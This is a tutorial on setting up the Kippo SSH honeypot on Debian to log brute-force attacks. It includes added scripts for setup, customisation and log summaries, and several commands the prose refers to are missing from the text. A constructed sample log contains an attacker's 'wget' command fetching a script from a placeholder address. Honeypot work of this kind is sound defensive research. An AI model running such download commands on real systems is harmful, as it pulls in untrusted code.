2014-01-30

Have you ever wanted to monitor brute-force attacks against your server and see how often, and how, attackers try to get in? Then you are on the right track. Read on to find out how.

Kippo is a medium-interaction SSH honeypot designed to log brute-force attacks and, most importantly, the entire shell session an attacker performs after logging in. Kippo presents a fake filesystem in which files can be added and removed, so attackers who brute-force their way in believe they have reached a real system and start interacting with it. Every interaction is logged and can be reviewed later.

You can also place fake file contents in that filesystem for the attacker to read. The default fake filesystem, however, is very dated and easily recognised as a honeypot, so it is better to clone the layout of your current filesystem into Kippo. Kippo does this without exposing real file contents to the attacker: the clone records only names and metadata, and file contents are served from the honeyfs/ directory. Kippo stores session logs in a UML-compatible format for easy replay with the original timings, and it saves files the attacker downloads with wget for later investigation.

Install Kippo On Debian / Ubuntu / Linux Mint

This how-to was tested on Debian 7, although the same steps apply to Ubuntu, Linux Mint and other Debian derivatives.

Kippo can be installed on any machine that meets the following requirements.

- An operating system (tested on Debian, CentOS, FreeBSD and Windows 7)

- Python 2.5+

- Twisted 8.0+

- PyCrypto

- Zope Interface

Since Kippo is Python based, install the necessary Python libraries using the following command. From now on, all commands are run as the root user unless stated otherwise.

The above command installs all the packages Kippo needs.

Attackers almost always start with the default SSH port, 22, so move the real SSH daemon to another port and leave 22 for the honeypot. Any free port will do; this guide uses 1984. If a firewall sits in front of the server, allow the new port before restarting sshd, or you will lock yourself out.

To do that, edit the file /etc/ssh/sshd_config:

Find the following line and change the default port number.

Save and exit the file, then restart the ssh service. Keep your current session open and verify that you can log in on the new port before closing it.

Create a non-privileged user, for example kippo, and run Kippo under this user; Kippo refuses to start as root.

Now log out and log in again as the kippo user.

Get the latest Kippo package from the project download page.

Extract the tar file using command:

This will create a directory called kippo-0.8 in your current directory.

Kippo directory contains the following contents.

Where,

dl – files downloaded with wget are stored here.
log/kippo.log – log/debug output.
log/tty/ – session logs.
utils/playlog.py – utility to replay session logs.
utils/createfs.py – used to create fs.pickle.
fs.pickle – fake filesystem.
honeyfs/ – file contents for the fake filesystem – feel free to copy a real system here.

Kippo listens on port 2222 by default. Now add an iptables rule that redirects incoming traffic for SSH port 22 to Kippo's port 2222 (a NAT rule in the PREROUTING chain, so it affects only traffic arriving from the network). The rule is not persistent across reboots; re-add it at boot, for example with iptables-persistent.

Note: run the above command as root, then switch back to the kippo user.
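The steps so far (installing the Python libraries, moving the real sshd off port 22, creating the kippo user and redirecting port 22 to Kippo) gathered into one re-runnable script, as an added example; this is not Kippo's own code nor the original article's. The Debian 7 package names, the port numbers, the user name and the use of `iptables -C` to test for an existing rule are assumptions; adjust them for your system.

```shell
#!/bin/sh
# kippo-setup.sh: added example (not Kippo's own code). Moves the real sshd to
# REAL_SSH_PORT, creates the unprivileged kippo user and redirects inbound port 22
# to Kippo's port. Package names, ports and user name are assumptions for Debian 7.
# Usage (as root):  sh kippo-setup.sh install
set -eu

REAL_SSH_PORT=1984      # where the real sshd moves to
KIPPO_PORT=2222         # Kippo's default listen port
KIPPO_USER=kippo        # Kippo refuses to run as root

# set_sshd_port FILE PORT: rewrite the Port directive of an sshd_config-style FILE
# in place. The first Port line (commented out or not) becomes "Port PORT" so it
# keeps its position ahead of any ListenAddress; later Port lines are dropped so
# sshd is not asked to bind the same port twice; if none exists one is appended.
set_sshd_port() {
    cfg=$1
    port=$2
    awk -v port="$port" '
        /^[# ]*Port[ \t]/ { if (!done) { print "Port " port; done = 1 }; next }
        { print }
        END { if (!done) print "Port " port }
    ' "$cfg" > "$cfg.tmp"
    cat "$cfg.tmp" > "$cfg"      # keep the original inode and permissions
    rm -f "$cfg.tmp"
}

# add_redirect_rule: NAT inbound port 22 to Kippo. PREROUTING only sees packets
# arriving from the network, so connections made on the host itself are not
# redirected, and the rule does not survive a reboot (use iptables-persistent).
add_redirect_rule() {
    # -C (iptables >= 1.4.11) succeeds if an identical rule is already present,
    # so re-running the script does not stack duplicate rules.
    iptables -t nat -C PREROUTING -p tcp --dport 22 -j REDIRECT --to-port "$KIPPO_PORT" 2>/dev/null ||
        iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-port "$KIPPO_PORT"
}

main() {
    [ "$(id -u)" -eq 0 ] || { echo "run this as root" >&2; exit 1; }
    apt-get install -y python-twisted python-crypto python-zope.interface python-pyasn1
    set_sshd_port /etc/ssh/sshd_config "$REAL_SSH_PORT"
    # Validate before restarting: a restart on a broken config locks you out.
    # Also open REAL_SSH_PORT in any upstream firewall before this point.
    sshd -t
    service ssh restart
    id "$KIPPO_USER" >/dev/null 2>&1 ||
        adduser --disabled-password --gecos '' "$KIPPO_USER"
    add_redirect_rule
    echo "Done. As $KIPPO_USER: unpack kippo-0.8 and run ./start.sh (it listens on $KIPPO_PORT)."
}

case "${1:-}" in
    install) main ;;
esac
```

Run it once as root with the `install` argument; the functions can also be sourced and called individually, which is how the sshd_config rewrite can be checked on a copy of the file before it is applied to the real one.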

Start Kippo

Once all configuration is done, go to the Kippo directory and start it as the kippo user.

Test Kippo Honeypot

After starting Kippo, SSH to the Debian server using the command below. Connect to port 22 from another host, or to port 2222 directly; the PREROUTING redirect does not apply to connections made from the honeypot host itself.

Kippo's default root password is 123456.

Sample output:

As the output shows, the attacker appears to log in to our Debian server as root, but lands only in the fake filesystem. From there they can create and delete files and directories, with nothing obvious to tell them the system is fake, while every keystroke is recorded.

As mentioned before, the default Kippo password is 123456. You can also configure additional passwords.

From your Kippo directory, enter the following commands (they add entries to data/userdb.txt, one per line in the form user:uid:password):

Where,

password, senthil and unixmen become alternative passwords for the root user: the attacker can log in to the honeypot as root with any of them. Use only throwaway passwords here, never one that is valid anywhere in your environment.

Miscellaneous

The following tasks are optional, but they make the honeypot more convincing to an attacker.

Change hostname:

The default Kippo hostname is nas3. To use a more realistic name, for example debian-server, edit kippo.cfg and change the hostname.

Go to your Kippo directory and edit the file kippo.cfg:

Find the following line and change the hostname to your liking.

When the attacker logs in, the fake shell prompt will show the hostname debian-server.

Change OS name:

Go to your Kippo directory and edit the file honeyfs/etc/issue, the copy served inside the fake filesystem (not the real /etc/issue on the host):

Change the OS name to your liking.

Clone filesystem:

As mentioned before, the default Kippo filesystem is outdated and easily recognised by an attacker. So go to your Kippo directory and clone the current filesystem with the following command, run as root. The clone captures directory layout and file metadata only; the contents an attacker reads come from honeyfs/. Names alone can still leak information (real user names under /home, for instance), so prefer a freshly installed machine as the source.

Don't forget to stop and start Kippo after editing the configuration. To stop Kippo, simply kill the process. To find the Kippo process id, enter the command:

Sample output:

Now kill it using the command:

To start Kippo again, go to your Kippo directory and start it as the kippo user. As noted earlier, Kippo does not start as root.
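The customisation steps from the password section onward (extra root passwords, hostname, cloned filesystem) together with the stop/start sequence just described, gathered into shell functions as an added example; this is not Kippo's own code nor the original article's. It assumes Kippo 0.8's layout: passwords in data/userdb.txt as user:uid:password lines, a `hostname = ` line in kippo.cfg, utils/createfs.py writing the fake filesystem to stdout, and start.sh launching twistd with `--pidfile kippo.pid`. The user name and the example values are assumptions.

```shell
#!/bin/sh
# kippo-customize.sh: added example (not Kippo's own code). Run from the Kippo
# directory. Assumes the Kippo 0.8 file layout described in the lead-in.
set -eu

KIPPO_USER=kippo

# userdb_add_root_passwords FILE PASSWORD...: append root:0:PASSWORD entries to
# data/userdb.txt, skipping any that already exist. Use only throwaway passwords
# here; anything real would be handed to every attacker who guesses it.
userdb_add_root_passwords() {
    db=$1
    shift
    for pw in "$@"; do
        grep -qxF "root:0:$pw" "$db" || printf 'root:0:%s\n' "$pw" >> "$db"
    done
}

# set_kippo_hostname CFG NAME: replace the "hostname = nas3" line in kippo.cfg,
# leaving every other line untouched.
set_kippo_hostname() {
    awk -v name="$2" '
        /^hostname[ \t]*=/ { print "hostname = " name; next }
        { print }
    ' "$1" > "$1.tmp"
    cat "$1.tmp" > "$1"
    rm -f "$1.tmp"
}

# clone_filesystem: run as root from the Kippo directory. createfs.py walks the
# real / and records names, sizes, modes and ownership only; contents are never
# copied (the attacker reads file contents from honeyfs/). Names alone can still
# leak information (real user names under /home), so prefer a clean source host.
clone_filesystem() {
    python utils/createfs.py > fs.pickle.new
    mv fs.pickle.new fs.pickle
    chown "$KIPPO_USER" fs.pickle     # the honeypot user must be able to read it
}

# restart_kippo: run as the kippo user from the Kippo directory. start.sh hands
# twistd --pidfile kippo.pid, so the pid is read from there instead of grepping ps.
restart_kippo() {
    if [ -f kippo.pid ]; then
        pid=$(cat kippo.pid)
        if kill -0 "$pid" 2>/dev/null; then
            kill "$pid"
            while kill -0 "$pid" 2>/dev/null; do sleep 1; done
        fi
    fi
    ./start.sh
}

# Example run as the kippo user (clone_filesystem separately, as root):
#   userdb_add_root_passwords data/userdb.txt password senthil unixmen
#   set_kippo_hostname kippo.cfg debian-server
#   printf 'Debian GNU/Linux 7 \\n \\l\n' > honeyfs/etc/issue
#   restart_kippo
```

The file-editing functions rewrite through `cat` rather than `mv` so the files keep their owner and permissions, which matters when the clone step runs as root inside a directory owned by the kippo user.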

More options are available for monitoring attackers. Go through kippo.cfg and tweak the settings to your needs. It is also advisable to keep the dl directory on a separate partition so downloaded files cannot fill the disk, and you can log to a MySQL database instead of flat files.

View logs

Curious what the attacker did on your system? That's simple: the logs are stored in the log directory inside the Kippo directory, with one recording per session under log/tty/ that utils/playlog.py replays with the original timings.

Go to your Kippo directory and view the log file as shown below.

Sample output:
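A small log summary as an added example (not Kippo's own code nor the article's): it runs over a few constructed lines in the format Kippo writes to log/kippo.log, extracts every login attempt with its source address, and shows which sources and passwords dominate. Twisted's bracketed prefix and the "login attempt [user/password] failed|succeeded" wording are what Kippo 0.8 emits; the addresses, timestamps and credentials are made up.

```shell
#!/bin/sh
# kippo-logstats.sh: added example (not Kippo's own code). Summarise login
# attempts recorded in log/kippo.log. The sample below is constructed; only the
# line format follows what Kippo writes.
set -eu

# write_sample_kippo_log FILE: constructed lines in Kippo's log format.
write_sample_kippo_log() {
    cat > "$1" <<'EOF'
2014-01-30 09:12:01+0000 [kippo.core.honeypot.HoneyPotSSHFactory] New connection: 198.51.100.23:51022 (192.0.2.10:2222) [session: 0]
2014-01-30 09:12:02+0000 [SSHService ssh-userauth on HoneyPotTransport,0,198.51.100.23] login attempt [root/admin] failed
2014-01-30 09:12:03+0000 [SSHService ssh-userauth on HoneyPotTransport,0,198.51.100.23] login attempt [root/root] failed
2014-01-30 09:12:04+0000 [SSHService ssh-userauth on HoneyPotTransport,0,198.51.100.23] login attempt [root/123456] succeeded
2014-01-30 09:12:09+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,0,198.51.100.23] CMD: wget http://203.0.113.9/x.sh
2014-01-30 09:13:40+0000 [kippo.core.honeypot.HoneyPotSSHFactory] New connection: 203.0.113.77:40101 (192.0.2.10:2222) [session: 1]
2014-01-30 09:13:41+0000 [SSHService ssh-userauth on HoneyPotTransport,1,203.0.113.77] login attempt [admin/admin] failed
2014-01-30 09:13:42+0000 [SSHService ssh-userauth on HoneyPotTransport,1,203.0.113.77] login attempt [root/123456] succeeded
EOF
}

# kippo_login_attempts LOG: one line per attempt, "ip status user password".
# The source address is the last element of the Twisted prefix
# "...HoneyPotTransport,<session>,<ip>]"; the credential sits between
# "login attempt [" and the closing "] failed|succeeded".
kippo_login_attempts() {
    awk '
        /\] login attempt \[/ {
            if (!match($0, /HoneyPotTransport,[0-9]+,[0-9.]+\]/)) next
            prefix = substr($0, RSTART, RLENGTH - 1)       # drop the trailing ]
            n = split(prefix, parts, ",")
            ip = parts[n]
            status = $NF                                  # failed or succeeded
            s = index($0, "login attempt [") + length("login attempt [")
            cred = substr($0, s, length($0) - s - length(status) - 1)
            slash = index(cred, "/")
            print ip, status, substr(cred, 1, slash - 1), substr(cred, slash + 1)
        }
    ' "$1"
}

# kippo_attempts_by_source LOG: "ip attempts successes", busiest source first.
kippo_attempts_by_source() {
    kippo_login_attempts "$1" | awk '
        { total[$1]++; if ($2 == "succeeded") ok[$1]++ }
        END { for (ip in total) print ip, total[ip], ok[ip] + 0 }
    ' | sort -k2,2nr -k1,1
}

# kippo_top_passwords LOG N: the N most tried passwords, "count password".
kippo_top_passwords() {
    kippo_login_attempts "$1" | awk '
        { p = $0; sub(/^[^ ]+ [^ ]+ [^ ]+ /, "", p); count[p]++ }   # password may contain spaces
        END { for (p in count) print count[p], p }
    ' | sort -k1,1nr -k2,2 | head -n "$2"
}

# Example run over the constructed log:
#   write_sample_kippo_log /tmp/kippo.log
#   kippo_attempts_by_source /tmp/kippo.log
#   kippo_top_passwords /tmp/kippo.log 3
```

Point the same functions at the real log/kippo.log to see which addresses keep coming back and which passwords they try; a source with many attempts and a success is the session worth replaying with utils/playlog.py.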

Conclusion

Note, however, that Kippo has not had a real security audit, and it is certainly vulnerable to some denial-of-service attacks: there are no limits on how many clients can connect or how many files they can download. It is therefore recommended to run Kippo in a well-firewalled virtual machine, isolated from production systems.

We have covered only the installation and some basic configuration. With Kippo you can learn how attackers try to break into your systems and what they do once inside, and then use that information to harden your real servers.

Good luck!

Reference Links:

Kippo Homepage

Kippo – A SSH Honeypot To Monitor Brute Force Attacks On Debian 7 / Ubuntu 13.10
